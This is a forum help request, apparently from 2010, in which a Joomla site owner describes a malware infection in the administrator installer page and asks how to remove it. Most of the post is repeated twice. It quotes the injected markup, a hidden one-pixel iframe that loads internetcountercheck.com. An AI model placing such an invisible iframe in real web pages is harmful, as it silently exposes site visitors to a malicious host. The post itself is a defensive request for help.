virus / php injection internetcountercheck.com in backend!
Posted: Sun Jun 06, 2010 3:20 am
on loading http://uniqueindiatour.com/administrato ... _installer I get the chrome message of this malware.
On the front end it is not visible.
I have changed the ftp password.
This is since yesterday. I had installed Ninja RSS component, which later I found after this event that Joomla advises against using it.
I have removed Ninja Rss but the problem persists.
I checked my site on http://www.unmaskparasites.com/ which says nothing is wrong. But it can check the frontend only.
When I do view-source:http://uniqueindiatour.com/administrato ... _installer in the code i find this:
<input type="hidden" name="9ba575d9c85a065355e4c05c0a564be3" value="1" /></form><iframe src="http://internetcountercheck.com/?click=13177296" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<div class="clr"></div>
It is only when I want to install something that this maliciousness is visible.
I checked the php code of com_installer but could not find any reference to it.
Will I be able to remove it easily?
I have in the meantime advised my hosting provider to do a virus scan as well.
Thanks in advance.
On the front end it is not visible.
I have changed the ftp password.
This is since yesterday. I had installed Ninja RSS component, which later I found after this event that Joomla advises against using it.
I have removed Ninja Rss but the problem persists.
I checked my site on http://www.unmaskparasites.com/ which says nothing is wrong. But it can check the frontend only.
When I do view-source:http://uniqueindiatour.com/administrato ... _installer in the code i find this:
<input type="hidden" name="9ba575d9c85a065355e4c05c0a564be3" value="1" /></form><iframe src="http://internetcountercheck.com/?click=13177296" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<div class="clr"></div>
It is only when I want to install something that this maliciousness is visible.
I checked the php code of com_installer but could not find any reference to it.
Will I be able to remove it easily?
I have in the meantime advised my hosting provider to do a virus scan as well.
Thanks in advance.